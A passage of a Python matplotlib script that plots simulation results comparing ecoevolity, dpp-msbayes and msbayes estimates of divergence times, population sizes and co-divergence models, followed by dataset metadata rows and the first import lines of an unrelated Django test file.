"\\scriptsize$p(k \\in \\textrm{{\\sffamily CS}}) = {0:.3f}$".format(
p_nevents_within_95_cred),
horizontalalignment = "right",
verticalalignment = "bottom",
transform = ax.transAxes)
ax.text(0.02, 0.98,
"\\scriptsize$p(\\hat{{k}} = k) = {0:.3f}$".format(
p_correct),
horizontalalignment = "left",
verticalalignment = "top",
transform = ax.transAxes)
# ax.text(0.99, 0.99,
# "\\scriptsize$\\overline{{pp(k)}} = {0:.3f}$".format(
# mean_true_nevents_prob),
# horizontalalignment = "right",
# verticalalignment = "top",
# transform = ax.transAxes)
ax.text(0.98, 0.98,
"\\scriptsize$\\widetilde{{p(k|\\mathbf{{D}})}} = {0:.3f}$".format(
median_true_nevents_prob),
horizontalalignment = "right",
verticalalignment = "top",
transform = ax.transAxes)
if row_idx == 0:
ax.text(0.5, 1.015,
col_header,
horizontalalignment = "center",
verticalalignment = "bottom",
size = 16.0,
transform = ax.transAxes)
# show only the outside ticks
all_axes = fig.get_axes()
for ax in all_axes:
if not ax.is_last_row():
ax.set_xticks([])
if not ax.is_first_col():
ax.set_yticks([])
# show tick labels only for lower-left plot
all_axes = fig.get_axes()
for ax in all_axes:
ax.xaxis.set_ticks(range(number_of_pairs))
ax.yaxis.set_ticks(range(number_of_pairs))
if ax.is_last_row() and ax.is_first_col():
xtick_labels = [item for item in ax.get_xticklabels()]
for i in range(len(xtick_labels)):
xtick_labels[i].set_text(str(i + 1))
ytick_labels = [item for item in ax.get_yticklabels()]
for i in range(len(ytick_labels)):
ytick_labels[i].set_text(str(i + 1))
ax.set_xticklabels(xtick_labels)
ax.set_yticklabels(ytick_labels)
else:
xtick_labels = ["" for item in ax.get_xticklabels()]
ytick_labels = ["" for item in ax.get_yticklabels()]
ax.set_xticklabels(xtick_labels)
ax.set_yticklabels(ytick_labels)
# avoid doubled spines
all_axes = fig.get_axes()
for ax in all_axes:
for sp in ax.spines.values():
sp.set_visible(False)
sp.set_linewidth(2)
if ax.is_first_row():
ax.spines['top'].set_visible(True)
ax.spines['bottom'].set_visible(True)
else:
ax.spines['bottom'].set_visible(True)
if ax.is_first_col():
ax.spines['left'].set_visible(True)
ax.spines['right'].set_visible(True)
else:
ax.spines['right'].set_visible(True)
fig.text(0.5, 0.002,
"True number of events ($k$)",
horizontalalignment = "center",
verticalalignment = "bottom",
size = 12.0)
fig.text(0.005, 0.5,
"MAP number of events ($\\hat{{k}}$)",
horizontalalignment = "left",
verticalalignment = "center",
rotation = "vertical",
size = 12.0)
gs.update(left = 0.08, right = 0.995, bottom = 0.14, top = 0.91)
plot_path = os.path.join(plot_dir,
"nevents.pdf")
plt.savefig(plot_path)
_LOG.info("Plots written to {0!r}\n".format(plot_path))
continue
if parameter_key == "model":
if number_of_pairs != 3:
continue
model_to_index = {
"000": 0,
"001": 1,
"010": 2,
"011": 3,
"012": 4,
}
number_of_models = len(model_to_index)
index_to_model = {}
for k, v in model_to_index.items():
index_to_model[v] = k
ecoevolity_results = {'true': [], 'map': [], 'cred_level': [],
'true_prob': [], 'map_prob': []}
ecoevolity_results['true'].extend(x for x in results["true_model"])
ecoevolity_results['map'].extend(x for x in results["map_model"])
ecoevolity_results['cred_level'].extend(float(x) for x in results["true_model_cred_level"])
ecoevolity_results['true_prob'].extend(float(x) for x in results["true_model_p"])
ecoevolity_results['map_prob'].extend(float(x) for x in results["map_model_p"])
all_results = {
'ecoevolity' : ecoevolity_results,
'dpp-msbayes': dpp_msbayes_results[parameter_key],
}
if include_msbayes:
all_results['msbayes'] = msbayes_results[parameter_key]
row_idx = 0
for col_idx, col_header in enumerate(col_headers):
r = all_results[col_header]
true_model = r['true']
map_model = r['map']
map_model_probs = r['map_prob']
true_model_probs = r['true_prob']
true_model_cred_levels = r['cred_level']
assert(len(true_model) == len(map_model))
assert(len(true_model) == len(true_model_cred_levels))
assert(len(true_model) == len(map_model_probs))
assert(len(true_model) == len(true_model_probs))
mean_true_model_prob = sum(true_model_probs) / len(true_model_probs)
median_true_model_prob = pycoevolity.stats.median(true_model_probs)
model_within_95_cred = 0
ncorrect = 0
true_map_model = []
true_map_probs = []
for i in range(number_of_models):
true_map_model.append([0 for i in range(number_of_models)])
true_map_probs.append([[] for i in range(number_of_models)])
for i in range(len(true_model)):
true_map_model[model_to_index[map_model[i]]][model_to_index[true_model[i]]] += 1
true_map_probs[model_to_index[map_model[i]]][model_to_index[true_model[i]]].append(map_model_probs[i])
if true_model_cred_levels[i] <= 0.95:
model_within_95_cred += 1
if true_model[i] == map_model[i]:
ncorrect += 1
p_model_within_95_cred = model_within_95_cred / float(len(true_model))
p_correct = ncorrect / float(len(true_model))
_LOG.info("p(model within CS) = {0:.4f}".format(p_model_within_95_cred))
ax = plt.subplot(gs[row_idx, col_idx])
ax.imshow(true_map_model,
origin = 'lower',
cmap = cmap,
interpolation = 'none',
aspect = 'auto'
# extent = [0.5, 3.5, 0.5, 3.5]
)
for i, row_list in enumerate(true_map_model):
for j, num_events in enumerate(row_list):
# if num_events > 0:
# map_probs = true_map_probs[i][j]
# assert len(map_probs) == num_events
# mean_prob = sum(map_probs) / len(map_probs)
# median_prob = pycoevolity.stats.median(map_probs)
# ax.text(j, i,
# "{0:d}\n{1:.3f}".format(num_events, median_prob),
# horizontalalignment = "center",
# verticalalignment = "center")
# else:
ax.text(j, i,
str(num_events),
horizontalalignment = "center",
verticalalignment = "center")
ax.text(0.98, 0.02,
"\\scriptsize$p(\\mathcal{{T}} \\in \\textrm{{\\sffamily CS}}) = {0:.3f}$".format(
p_model_within_95_cred),
horizontalalignment = "right",
verticalalignment = "bottom",
transform = ax.transAxes)
ax.text(0.02, 0.98,
"\\scriptsize$p(\\hat{{\\mathcal{{T}}}} = \\mathcal{{T}}) = {0:.3f}$".format(
p_correct),
horizontalalignment = "left",
verticalalignment = "top",
transform = ax.transAxes)
# ax.text(0.99, 0.99,
# "\\scriptsize$\\overline{{pp(k)}} = {0:.3f}$".format(
# mean_true_model_prob),
# horizontalalignment = "right",
# verticalalignment = "top",
# transform = ax.transAxes)
ax.text(0.98, 0.98,
"\\scriptsize$\\widetilde{{p(\\mathcal{{T}}|\\mathbf{{D}})}} = {0:.3f}$".format(
median_true_model_prob),
horizontalalignment = "right",
verticalalignment = "top",
transform = ax.transAxes)
if row_idx == 0:
ax.text(0.5, 1.015,
col_header,
horizontalalignment = "center",
verticalalignment = "bottom",
size = 16.0,
transform = ax.transAxes)
# show only the outside ticks
all_axes = fig.get_axes()
for ax in all_axes:
if not ax.is_last_row():
ax.set_xticks([])
if not ax.is_first_col():
ax.set_yticks([])
# show tick labels only for lower-left plot
all_axes = fig.get_axes()
for ax in all_axes:
ax.xaxis.set_ticks(range(number_of_models))
ax.yaxis.set_ticks(range(number_of_models))
if ax.is_last_row() and ax.is_first_col():
xtick_labels = [item for item in ax.get_xticklabels()]
for i in range(len(xtick_labels)):
xtick_labels[i].set_text(index_to_model[i])
ytick_labels = [item for item in ax.get_yticklabels()]
for i in range(len(ytick_labels)):
ytick_labels[i].set_text(index_to_model[i])
ax.set_xticklabels(xtick_labels)
ax.set_yticklabels(ytick_labels)
else:
xtick_labels = ["" for item in ax.get_xticklabels()]
ytick_labels = ["" for item in ax.get_yticklabels()]
ax.set_xticklabels(xtick_labels)
ax.set_yticklabels(ytick_labels)
# avoid doubled spines
all_axes = fig.get_axes()
for ax in all_axes:
for sp in ax.spines.values():
sp.set_visible(False)
sp.set_linewidth(2)
if ax.is_first_row():
ax.spines['top'].set_visible(True)
ax.spines['bottom'].set_visible(True)
else:
ax.spines['bottom'].set_visible(True)
if ax.is_first_col():
ax.spines['left'].set_visible(True)
ax.spines['right'].set_visible(True)
else:
ax.spines['right'].set_visible(True)
fig.text(0.5, 0.002,
"True model ($\\mathcal{{T}}$)",
horizontalalignment = "center",
verticalalignment = "bottom",
size = 12.0)
fig.text(0.005, 0.5,
"MAP model ($\\hat{{\\mathcal{{T}}}}$)",
horizontalalignment = "left",
verticalalignment = "center",
rotation = "vertical",
size = 12.0)
gs.update(left = 0.095, right = 0.995, bottom = 0.14, top = 0.91)
plot_path = os.path.join(plot_dir,
"model.pdf")
plt.savefig(plot_path)
_LOG.info("Plots written to {0!r}\n".format(plot_path))
continue
parameter_min = float('inf')
parameter_max = float('-inf')
for parameter_str in parameters:
parameter_min = min(parameter_min,
min(float(x) for x in results["true_{0}".format(parameter_str)]))
parameter_max = max(parameter_max,
max(float(x) for x in results["true_{0}".format(parameter_str)]))
parameter_min = min(parameter_min,
min(float(x) for x in results["mean_{0}".format(parameter_str)]))
parameter_max = max(parameter_max,
max(float(x) for x in results["mean_{0}".format(parameter_str)]))
parameter_min = min(parameter_min,
min(dpp_msbayes_results[parameter_key]['true']))
parameter_min = min(parameter_min,
min(dpp_msbayes_results[parameter_key]['mean']))
parameter_max = max(parameter_max,
max(dpp_msbayes_results[parameter_key]['true']))
parameter_max = max(parameter_max,
max(dpp_msbayes_results[parameter_key]['mean']))
if include_msbayes:
parameter_min = min(parameter_min,
min(msbayes_results[parameter_key]['true']))
parameter_min = min(parameter_min,
min(msbayes_results[parameter_key]['mean']))
parameter_max = max(parameter_max,
max(msbayes_results[parameter_key]['true']))
parameter_max = max(parameter_max,
max(msbayes_results[parameter_key]['mean']))
axis_buffer = math.fabs(parameter_max - parameter_min) * 0.05
axis_min = parameter_min - axis_buffer
axis_max = parameter_max + axis_buffer
ecoevolity_results = {'true': [], 'mean': [], 'lower': [], 'upper': []}
for parameter_str in parameters:
ecoevolity_results['true'].extend(float(x) for x in results["true_{0}".format(parameter_str)])
ecoevolity_results['mean'].extend(float(x) for x in results["mean_{0}".format(parameter_str)])
ecoevolity_results['lower'].extend(float(x) for x in results["eti_95_lower_{0}".format(parameter_str)])
ecoevolity_results['upper'].extend(float(x) for x in results["eti_95_upper_{0}".format(parameter_str)])
all_results = {
'ecoevolity' : ecoevolity_results,
'dpp-msbayes': dpp_msbayes_results[parameter_key],
}
if include_msbayes:
all_results['msbayes'] = msbayes_results[parameter_key]
row_idx = 0
for col_idx, col_header in enumerate(col_headers):
r = all_results[col_header]
x = r['true']
y = r['mean']
y_lower = r['lower']
y_upper = r['upper']
assert(len(x) == len(y))
assert(len(x) == len(y_lower))
assert(len(x) == len(y_upper))
proportion_within_ci = pycoevolity.stats.get_proportion_of_values_within_intervals(
x,
y_lower,
y_upper)
rmse = pycoevolity.stats.root_mean_square_error(x, y)
_LOG.info("p(within CI) = {0:.4f}".format(proportion_within_ci))
_LOG.info("RMSE = {0:.2e}".format(rmse))
ax = plt.subplot(gs[row_idx, col_idx])
line = ax.errorbar(
x = x,
y = y,
yerr = get_errors(y, y_lower, y_upper),
ecolor = '0.65',
elinewidth = 0.5,
capsize = 0.8,
barsabove = False,
marker = 'o',
linestyle = '',
markerfacecolor = 'none',
markeredgecolor = '0.35',
markeredgewidth = 0.7,
markersize = 2.5,
zorder = 100,
rasterized = True)
ax.set_xlim(axis_min, axis_max)
ax.set_ylim(axis_min, axis_max)
identity_line, = ax.plot(
[axis_min, axis_max],
[axis_min, axis_max])
plt.setp(identity_line,
color = '0.7',
linestyle = '-',
linewidth = 1.0,
marker = '',
zorder = 0)
ax.text(0.02, 0.97,
"\\scriptsize\\noindent$p({0:s} \\in \\textrm{{\\sffamily CI}}) = {1:.3f}$".format(
parameter_symbol,
proportion_within_ci),
horizontalalignment = "left",
verticalalignment = "top",
transform = ax.transAxes,
size = 6.0,
zorder = 200)
ax.text(0.02, 0.87,
# "\\scriptsize\\noindent$\\textrm{{\\sffamily RMSE}} = {0:.2e}$".format(
"\\scriptsize\\noindent RMSE = {0:.2e}".format(
rmse),
horizontalalignment = "left",
verticalalignment = "top",
transform = ax.transAxes,
size = 6.0,
zorder = 200)
if row_idx == 0:
ax.text(0.5, 1.015,
col_header,
horizontalalignment = "center",
verticalalignment = "bottom",
size = 16.0,
transform = ax.transAxes)
# show only the outside ticks
all_axes = fig.get_axes()
for ax in all_axes:
if not ax.is_last_row():
ax.set_xticks([])
if not ax.is_first_col():
ax.set_yticks([])
# show tick labels only for lower-left plot
all_axes = fig.get_axes()
for ax in all_axes:
if ax.is_last_row() and ax.is_first_col():
continue
xtick_labels = ["" for item in ax.get_xticklabels()]
ytick_labels = ["" for item in ax.get_yticklabels()]
ax.set_xticklabels(xtick_labels)
ax.set_yticklabels(ytick_labels)
# avoid doubled spines
all_axes = fig.get_axes()
for ax in all_axes:
for sp in ax.spines.values():
sp.set_visible(False)
sp.set_linewidth(2)
if ax.is_first_row():
ax.spines['top'].set_visible(True)
ax.spines['bottom'].set_visible(True)
else:
ax.spines['bottom'].set_visible(True)
if ax.is_first_col():
ax.spines['left'].set_visible(True)
ax.spines['right'].set_visible(True)
else:
ax.spines['right'].set_visible(True)
fig.text(0.5, 0.001,
"True {0} (${1}$)".format(parameter_label, parameter_symbol),
horizontalalignment = "center",
verticalalignment = "bottom",
size = 14.0)
fig.text(0.005, 0.5,
"Estimated {0} ($\\hat{{{1}}}$)".format(parameter_label, parameter_symbol),
horizontalalignment = "left",
verticalalignment = "center",
rotation = "vertical",
size = 12.0)
gs.update(left = 0.11, right = 0.995, bottom = 0.17, top = 0.92)
plot_file_prefix = parameter_label.replace(" ", "-")
plot_path = os.path.join(plot_dir,
"{0}-scatter.pdf".format(plot_file_prefix))
plt.savefig(plot_path, dpi=600)
_LOG.info("Plots written to {0!r}\n".format(plot_path))
def main_cli(argv = sys.argv):
generate_scatter_plots(
parameters = [
"root_height_c1sp1",
"root_height_c2sp1",
"root_height_c3sp1",
],
parameter_label = "divergence time",
parameter_symbol = "t",
plot_file_prefix = "div-time",
include_all_sizes_fixed = True,
include_root_size_fixed = False)
generate_scatter_plots(
parameters = [
"root_height_c1sp1",
"root_height_c2sp1",
"root_height_c3sp1",
],
parameter_label = "divergence time",
parameter_symbol = "t",
plot_file_prefix = "linkage-100k-div-time",
include_all_sizes_fixed = True,
include_root_size_fixed = False,
linked_loci = "100k")
generate_scatter_plots(
parameters = [
"root_height_c1sp1",
"root_height_c2sp1",
"root_height_c3sp1",
],
parameter_label = "divergence time",
parameter_symbol = "t",
plot_file_prefix = "linkage-500k-div-time",
include_all_sizes_fixed = True,
include_root_size_fixed = False,
linked_loci = "500k")
generate_scatter_plots(
parameters = [
"root_height_c1sp1",
"root_height_c2sp1",
"root_height_c3sp1",
],
parameter_label = "divergence time",
parameter_symbol = "t",
plot_file_prefix = "linkage-500k-div-time-no-vo",
include_all_sizes_fixed = True,
include_root_size_fixed = False,
linked_loci = "500k",
include_variable_only = False)
generate_scatter_plots(
parameters = [
"root_height_c1sp1",
"root_height_c2sp1",
"root_height_c3sp1",
],
parameter_label = "divergence time",
parameter_symbol = "t",
plot_file_prefix = "missing-data-div-time",
include_all_sizes_fixed = True,
include_root_size_fixed = False,
linked_loci = None,
missing_data = True)
generate_scatter_plots(
parameters = [
"root_height_c1sp1",
"root_height_c2sp1",
"root_height_c3sp1",
],
parameter_label = "divergence time",
parameter_symbol = "t",
plot_file_prefix = "filtered-data-div-time",
include_all_sizes_fixed = True,
include_root_size_fixed = False,
linked_loci = None,
missing_data = False,
filtered_data = True)
generate_root_1000_500k_scatter_plots(
parameters = [
"root_height_c1sp1",
"root_height_c2sp1",
"root_height_c3sp1",
],
parameter_label = "divergence time",
parameter_symbol = "t",
plot_file_prefix = "div-time")
generate_scatter_plots(
parameters = [
"pop_size_root_c1sp1",
"pop_size_root_c2sp1",
"pop_size_root_c3sp1",
],
parameter_label = "root population size",
parameter_symbol = "N_e\\mu",
plot_file_prefix = "root-pop-size",
include_all_sizes_fixed = False,
include_root_size_fixed = False)
generate_scatter_plots(
parameters = [
"pop_size_root_c1sp1",
"pop_size_root_c2sp1",
"pop_size_root_c3sp1",
],
parameter_label = "root population size",
parameter_symbol = "N_e\\mu",
plot_file_prefix = "linkage-100k-root-pop-size",
include_all_sizes_fixed = False,
include_root_size_fixed = False,
linked_loci = "100k")
generate_scatter_plots(
parameters = [
"pop_size_root_c1sp1",
"pop_size_root_c2sp1",
"pop_size_root_c3sp1",
],
parameter_label = "root population size",
parameter_symbol = "N_e\\mu",
plot_file_prefix = "linkage-500k-root-pop-size",
include_all_sizes_fixed = False,
include_root_size_fixed = False,
linked_loci = "500k")
generate_scatter_plots(
parameters = [
"pop_size_root_c1sp1",
"pop_size_root_c2sp1",
"pop_size_root_c3sp1",
],
parameter_label = "root population size",
parameter_symbol = "N_e\\mu",
plot_file_prefix = "missing-data-root-pop-size",
include_all_sizes_fixed = False,
include_root_size_fixed = False,
linked_loci = None,
missing_data = True)
generate_scatter_plots(
parameters = [
"pop_size_root_c1sp1",
"pop_size_root_c2sp1",
"pop_size_root_c3sp1",
],
parameter_label = "root population size",
parameter_symbol = "N_e\\mu",
plot_file_prefix = "filtered-data-root-pop-size",
include_all_sizes_fixed = False,
include_root_size_fixed = False,
linked_loci = None,
missing_data = False,
filtered_data = True)
generate_root_1000_500k_scatter_plots(
parameters = [
"pop_size_root_c1sp1",
"pop_size_root_c2sp1",
"pop_size_root_c3sp1",
],
parameter_label = "root population size",
parameter_symbol = "N_e\\mu",
plot_file_prefix = "root-pop-size")
generate_scatter_plots(
parameters = [
"pop_size_c1sp1",
"pop_size_c2sp1",
"pop_size_c3sp1",
],
parameter_label = "leaf population size",
parameter_symbol = "N_e\\mu",
plot_file_prefix = "leaf-pop-size",
include_all_sizes_fixed = False,
include_root_size_fixed = False)
generate_scatter_plots(
parameters = [
"pop_size_c1sp1",
"pop_size_c2sp1",
"pop_size_c3sp1",
],
parameter_label = "leaf population size",
parameter_symbol = "N_e\\mu",
plot_file_prefix = "linkage-100k-leaf-pop-size",
include_all_sizes_fixed = False,
include_root_size_fixed = False,
linked_loci = "100k")
generate_scatter_plots(
parameters = [
"pop_size_c1sp1",
"pop_size_c2sp1",
"pop_size_c3sp1",
],
parameter_label = "leaf population size",
parameter_symbol = "N_e\\mu",
plot_file_prefix = "linkage-500k-leaf-pop-size",
include_all_sizes_fixed = False,
include_root_size_fixed = False,
linked_loci = "500k")
generate_scatter_plots(
parameters = [
"pop_size_c1sp1",
"pop_size_c2sp1",
"pop_size_c3sp1",
],
parameter_label = "leaf population size",
parameter_symbol = "N_e\\mu",
plot_file_prefix = "missing-data-leaf-pop-size",
include_all_sizes_fixed = False,
include_root_size_fixed = False,
linked_loci = None,
missing_data = True)
generate_scatter_plots(
parameters = [
"pop_size_c1sp1",
"pop_size_c2sp1",
"pop_size_c3sp1",
],
parameter_label = "leaf population size",
parameter_symbol = "N_e\\mu",
plot_file_prefix = "filtered-data-leaf-pop-size",
include_all_sizes_fixed = False,
include_root_size_fixed = False,
linked_loci = None,
missing_data = False,
filtered_data = True)
generate_root_1000_500k_scatter_plots(
parameters = [
"pop_size_c1sp1",
"pop_size_c2sp1",
"pop_size_c3sp1",
],
parameter_label = "leaf population size",
parameter_symbol = "N_e\\mu",
plot_file_prefix = "leaf-pop-size")
generate_model_plots(
number_of_comparisons = 3,
include_all_sizes_fixed = True,
include_root_size_fixed = False)
generate_model_plots(
number_of_comparisons = 3,
include_all_sizes_fixed = True,
include_root_size_fixed = False,
show_all_models = True)
generate_model_plots(
number_of_comparisons = 3,
include_all_sizes_fixed = True,
include_root_size_fixed = False,
linked_loci = "100k")
generate_model_plots(
number_of_comparisons = 3,
include_all_sizes_fixed = True,
include_root_size_fixed = False,
linked_loci = "100k",
show_all_models = True)
generate_model_plots(
number_of_comparisons = 3,
include_all_sizes_fixed = True,
include_root_size_fixed = False,
linked_loci = "500k")
generate_model_plots(
number_of_comparisons = 3,
include_all_sizes_fixed = True,
include_root_size_fixed = False,
linked_loci = "500k",
show_all_models = True)
generate_model_plots(
number_of_comparisons = 3,
include_all_sizes_fixed = True,
include_root_size_fixed = False,
linked_loci = "500k",
include_variable_only = False)
generate_model_plots(
number_of_comparisons = 3,
include_all_sizes_fixed = True,
include_root_size_fixed = False,
linked_loci = "500k",
include_variable_only = False,
show_all_models = True)
generate_model_plots(
number_of_comparisons = 3,
include_all_sizes_fixed = True,
include_root_size_fixed = False,
linked_loci = None,
missing_data = True)
generate_model_plots(
number_of_comparisons = 3,
include_all_sizes_fixed = True,
include_root_size_fixed = False,
linked_loci = None,
missing_data = True,
show_all_models = True)
generate_model_plots(
number_of_comparisons = 3,
include_all_sizes_fixed = True,
include_root_size_fixed = False,
linked_loci = None,
missing_data = False,
filtered_data = True)
generate_model_plots(
number_of_comparisons = 3,
include_all_sizes_fixed = True,
include_root_size_fixed = False,
linked_loci = None,
missing_data = False,
filtered_data = True,
show_all_models = True)
generate_root_1000_500k_model_plots(
number_of_comparisons = 3)
generate_histograms(
parameters = [
"n_var_sites_c1",
"n_var_sites_c2",
"n_var_sites_c3",
],
parameter_label = "Number of variable sites",
plot_file_prefix = "number-of-variable-sites-500k",
parameter_discrete = True,
range_key = "range",
number_of_digits = 0,
include_all_sizes_fixed = True,
include_root_size_fixed = False,
include_variable_only = False,
row_indices = [0])
generate_histograms(
parameters = [
"n_var_sites_c1",
"n_var_sites_c2",
"n_var_sites_c3",
],
parameter_label = "Number of variable sites",
plot_file_prefix = "number-of-variable-sites-100k",
parameter_discrete = True,
range_key = "range",
number_of_digits = 0,
include_all_sizes_fixed = True,
include_root_size_fixed = False,
include_variable_only = False,
row_indices = [1])
generate_histograms(
parameters = [
"n_var_sites_c1",
"n_var_sites_c2",
"n_var_sites_c3",
],
parameter_label = "Number of variable sites",
plot_file_prefix = "linkage-100k-number-of-variable-sites",
parameter_discrete = True,
range_key = "range",
number_of_digits = 0,
include_all_sizes_fixed = True,
include_root_size_fixed = False,
include_variable_only = False,
linked_loci = "100k")
generate_histograms(
parameters = [
"n_var_sites_c1",
"n_var_sites_c2",
"n_var_sites_c3",
],
parameter_label = "Number of variable sites",
plot_file_prefix = "linkage-500k-number-of-variable-sites",
parameter_discrete = True,
range_key = "range",
number_of_digits = 0,
include_all_sizes_fixed = True,
include_root_size_fixed = False,
include_variable_only = False,
linked_loci = "500k")
generate_histograms(
parameters = [
"ess_sum_ln_likelihood",
],
parameter_label = "Effective sample size of log likelihood",
plot_file_prefix = "ess-ln-likelihood",
parameter_discrete = False,
range_key = "range",
number_of_digits = 0,
include_all_sizes_fixed = True,
include_root_size_fixed = False,
include_variable_only = True)
generate_histograms(
parameters = [
"ess_sum_ln_likelihood",
],
parameter_label = "Effective sample size of log likelihood",
plot_file_prefix = "linkage-100k-ess-ln-likelihood",
parameter_discrete = False,
range_key = "range",
number_of_digits = 0,
include_all_sizes_fixed = True,
include_root_size_fixed = False,
include_variable_only = True,
linked_loci = "100k")
generate_histograms(
parameters = [
"ess_sum_ln_likelihood",
],
parameter_label = "Effective sample size of log likelihood",
plot_file_prefix = "linkage-500k-ess-ln-likelihood",
parameter_discrete = False,
range_key = "range",
number_of_digits = 0,
include_all_sizes_fixed = True,
include_root_size_fixed = False,
include_variable_only = True,
linked_loci = "500k")
generate_histograms(
parameters = [
"ess_sum_root_height_c1sp1",
"ess_sum_root_height_c2sp1",
"ess_sum_root_height_c3sp1",
],
parameter_label = "Effective sample size of divergence time",
plot_file_prefix = "ess-div-time",
parameter_discrete = False,
range_key = "range",
number_of_digits = 0,
include_all_sizes_fixed = True,
include_root_size_fixed = False,
include_variable_only = True)
generate_histograms(
parameters = [
"ess_sum_root_height_c1sp1",
"ess_sum_root_height_c2sp1",
"ess_sum_root_height_c3sp1",
],
parameter_label = "Effective sample size of divergence time",
plot_file_prefix = "linkage-100k-ess-div-time",
parameter_discrete = False,
range_key = "range",
number_of_digits = 0,
include_all_sizes_fixed = True,
include_root_size_fixed = False,
include_variable_only = True,
linked_loci = "100k")
generate_histograms(
parameters = [
"ess_sum_root_height_c1sp1",
"ess_sum_root_height_c2sp1",
"ess_sum_root_height_c3sp1",
],
parameter_label = "Effective sample size of divergence time",
plot_file_prefix = "linkage-500k-ess-div-time",
parameter_discrete = False,
range_key = "range",
number_of_digits = 0,
include_all_sizes_fixed = True,
include_root_size_fixed = False,
include_variable_only = True,
linked_loci = "500k")
generate_histograms(
parameters = [
"ess_sum_pop_size_root_c1sp1",
"ess_sum_pop_size_root_c2sp1",
"ess_sum_pop_size_root_c3sp1",
],
parameter_label = "Effective sample size of root population size",
plot_file_prefix = "ess-root-pop-size",
parameter_discrete = False,
range_key = "range",
number_of_digits = 0,
include_all_sizes_fixed = False,
include_root_size_fixed = False,
include_variable_only = True)
generate_histograms(
parameters = [
"ess_sum_pop_size_root_c1sp1",
"ess_sum_pop_size_root_c2sp1",
"ess_sum_pop_size_root_c3sp1",
],
parameter_label = "Effective sample size of root population size",
plot_file_prefix = "linkage-100k-ess-root-pop-size",
parameter_discrete = False,
range_key = "range",
number_of_digits = 0,
include_all_sizes_fixed = False,
include_root_size_fixed = False,
include_variable_only = True,
linked_loci = "100k")
generate_histograms(
parameters = [
"ess_sum_pop_size_root_c1sp1",
"ess_sum_pop_size_root_c2sp1",
"ess_sum_pop_size_root_c3sp1",
],
parameter_label = "Effective sample size of root population size",
plot_file_prefix = "linkage-500k-ess-root-pop-size",
parameter_discrete = False,
range_key = "range",
number_of_digits = 0,
include_all_sizes_fixed = False,
include_root_size_fixed = False,
include_variable_only = True,
linked_loci = "500k")
generate_histograms(
parameters = [
"psrf_ln_likelihood",
],
parameter_label = "PSRF of log likelihood",
plot_file_prefix = "psrf-ln-likelihood",
parameter_discrete = False,
range_key = "range",
number_of_digits = 3,
include_all_sizes_fixed = True,
include_root_size_fixed = False,
include_variable_only = True)
generate_histograms(
parameters = [
"psrf_ln_likelihood",
],
parameter_label = "PSRF of log likelihood",
plot_file_prefix = "linkage-100k-psrf-ln-likelihood",
parameter_discrete = False,
range_key = "range",
number_of_digits = 3,
include_all_sizes_fixed = True,
include_root_size_fixed = False,
include_variable_only = True,
linked_loci = "100k")
generate_histograms(
parameters = [
"psrf_ln_likelihood",
],
parameter_label = "PSRF of log likelihood",
plot_file_prefix = "linkage-500k-psrf-ln-likelihood",
parameter_discrete = False,
range_key = "range",
number_of_digits = 3,
include_all_sizes_fixed = True,
include_root_size_fixed = False,
include_variable_only = True,
linked_loci = "500k")
generate_histograms(
parameters = [
"psrf_root_height_c1sp1",
"psrf_root_height_c2sp1",
"psrf_root_height_c3sp1",
],
parameter_label = "PSRF of divergence time",
plot_file_prefix = "psrf-div-time",
parameter_discrete = False,
range_key = "range",
number_of_digits = 3,
include_all_sizes_fixed = True,
include_root_size_fixed = False,
include_variable_only = True)
generate_histograms(
parameters = [
"psrf_root_height_c1sp1",
"psrf_root_height_c2sp1",
"psrf_root_height_c3sp1",
],
parameter_label = "PSRF of divergence time",
plot_file_prefix = "linkage-100k-psrf-div-time",
parameter_discrete = False,
range_key = "range",
number_of_digits = 3,
include_all_sizes_fixed = True,
include_root_size_fixed = False,
include_variable_only = True,
linked_loci = "100k")
generate_histograms(
parameters = [
"psrf_root_height_c1sp1",
"psrf_root_height_c2sp1",
"psrf_root_height_c3sp1",
],
parameter_label = "PSRF of divergence time",
plot_file_prefix = "linkage-500k-psrf-div-time",
parameter_discrete = False,
range_key = "range",
number_of_digits = 3,
include_all_sizes_fixed = True,
include_root_size_fixed = False,
include_variable_only = True,
linked_loci = "500k")
plot_ess_versus_error(
parameters = [
"root_height_c1sp1",
"root_height_c2sp1",
"root_height_c3sp1",
],
parameter_label = "divergence time",
plot_file_prefix = "div-time",
include_all_sizes_fixed = True,
include_root_size_fixed = False)
generate_bake_off_plots(
number_of_pairs = 3,
number_of_sims = 500,
posterior_sample_size = 2000,
prior_sample_size = 500000)
plot_nevents_estimated_vs_true_probs(
nevents = 1,
sim_dir = "03pairs-dpp-root-0100-100k",
nbins = 5,
plot_file_prefix = "100k-sites")
plot_nevents_estimated_vs_true_probs(
nevents = 1,
sim_dir = "03pairs-dpp-root-0100-100k-0100l",
nbins = 5,
plot_file_prefix = "linkage-100-100k-sites",
include_unlinked_only = True)
plot_nevents_estimated_vs_true_probs(
nevents = 1,
sim_dir = "03pairs-dpp-root-0100-100k-0500l",
nbins = 5,
plot_file_prefix = "linkage-500-100k-sites",
include_unlinked_only = True)
if __name__ == "__main__":
main_cli()
| 41.908104
| 122
| 0.520666
| 16,745
| 150,492
| 4.383756
| 0.033503
| 0.011116
| 0.012969
| 0.017165
| 0.886848
| 0.863322
| 0.844917
| 0.831867
| 0.817454
| 0.79691
| 0
| 0.031216
| 0.372458
| 150,492
| 3,590
| 123
| 41.919777
| 0.746061
| 0.034673
| 0
| 0.788001
| 0
| 0.00373
| 0.103002
| 0.02922
| 0
| 0
| 0
| 0
| 0.020827
| 1
| 0.008082
| false
| 0.000622
| 0.003419
| 0
| 0.017097
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f1425d9038b7ef5c9a403dea3a7ddc3422d3eaac
| 19,805
|
py
|
Python
|
backend/customer_invoicing/tests.py
|
StichtingIAPC/swipe
|
d1ea35a40813d2d5e9cf9edde33148c0a825efc4
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
backend/customer_invoicing/tests.py
|
StichtingIAPC/swipe
|
d1ea35a40813d2d5e9cf9edde33148c0a825efc4
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
backend/customer_invoicing/tests.py
|
StichtingIAPC/swipe
|
d1ea35a40813d2d5e9cf9edde33148c0a825efc4
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
from django.test import TestCase
from tools.testing import TestData
from sales.models import Transaction, SalesTransactionLine, Payment, IncorrectDataException
